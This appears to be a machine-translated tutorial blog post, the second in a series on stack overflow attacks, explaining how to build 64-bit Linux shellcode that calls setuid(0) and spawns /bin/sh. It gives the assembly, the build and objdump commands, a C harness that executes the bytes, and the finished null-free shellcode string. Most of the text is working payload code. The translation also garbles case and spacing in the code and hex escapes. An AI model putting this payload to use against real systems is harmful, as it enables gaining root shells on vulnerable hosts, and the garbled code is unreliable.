Stack Overflow Attack series: Shellcode root access in Linux x86 64-bit attacks (ii) shellcode

Shellcode is a set of instruction opcode that can be run by a program, because Shellcode is to manipulate registers and functions directly, so opcode must be in hexadecimal form.

Since it is an attack, the main purpose of Shellcode is to call system functions, while under x86 there are two ways under Linux.

The first is to enter the kernel state through a direct call to interrupt int 0x80, thus achieving the purpose of invocation.

The second type is by calling libc Syscall (64-bit) and Sysenter (32-bit)

Syscall is currently recommended for 64-bit Linux, because opcode is a 16-binary instruction set that can be compiled into code and then executed to execute code, and finally view opcode.

Now that we want to get root and continue executing the shell, we usually use the following code (not to discuss Linux-related knowledge).

Shell.c

#include <stdio.h>int main () {setuid (0); Execve ("/bin/sh", Null,null);}

and the corresponding assembly code is as follows

Global _start_start:xor Rdi,rdixor Rax,raxmov al,0x69syscallxor RDX, Rdxmov rbx, 0x68732f6e69622fffshr rbx, 0x8push Rbxmo V RDI, Rspxor Rax, Raxpush raxpush Rdimov RSI, Rspmov al, 0x3bsyscall

This is not through disassembly shell.c out of the results, but by reference to some of the information obtained, you can refer to click to open the link
This code is not a shellcode to execute, but we can get the opcode we need by compiling it into an executable file.

Nasm-f elf64 shell.asm   ld-o Shell shell.oobjdump-d Shell

Note: Use ELF64 under 64-bit and 32-bit under ELF32

The results of using Objdump are as follows:

Shell:file format elf64-x86-64disassembly of section. text:0000000000400080 <_start>: 400080:48 FF                   XOR%rdi,%rdi 400083:48 C0 xor%rax,%rax 400086:b0 69 mov $0x69,%al 400088:0f syscall 40008a:48 D2 xor%rdx,%rd X 40008d:48 BB ff 2f 6e mov $0x68732f6e69622fff,%rbx 400094:2f 400097:48 C1 EB 0 8 shr $0x8,%rbx 40009b:53 push%rbx 40009c:48 E7 m   OV%rsp,%rdi 40009f:48 C0 xor%rax,%rax 4000a2:50 push%rax       4000a3:57 push%rdi 4000a4:48 e6 mov%rsp,%rsi 4000a7: B0 3b mov $0x3b,%al 4000a9:0f syscall~

OK, in the middle of the FF-C0 is the executable opcode code we need
Write code test we opcode:

Shelltest.c

#include <stdio.h> #include <string.h>char *shellcode = "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\ X31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\ XE6\XB0\X3B\X0F\X05 "; int main (void) {fprintf (stdout," Length:%d\n ", strlen (shellcode));(* (void (*) ()) shellcode) (); return 0;}

Gcc-o shelltest Shelltest.c./shelltest

See the execution results, we cut into the shell environment

\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\ x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05

Is the shellcode that we want to perform.

Attention: Not all executable shellcode can be used for attack execution, one function may not be able to be called in the current environment, and the most important point opcode is not allowed to appear in the/x0, why? Because in the overflow of the manufacturing stack, we are exploiting the vulnerability of some dangerous functions, such as strcpy, these functions encounter/x0 as the Terminator when they are called, which causes opcode to not be fully replicated.

Stack Overflow Attack series: Shellcode root access in Linux x86 64-bit attacks (ii) shellcode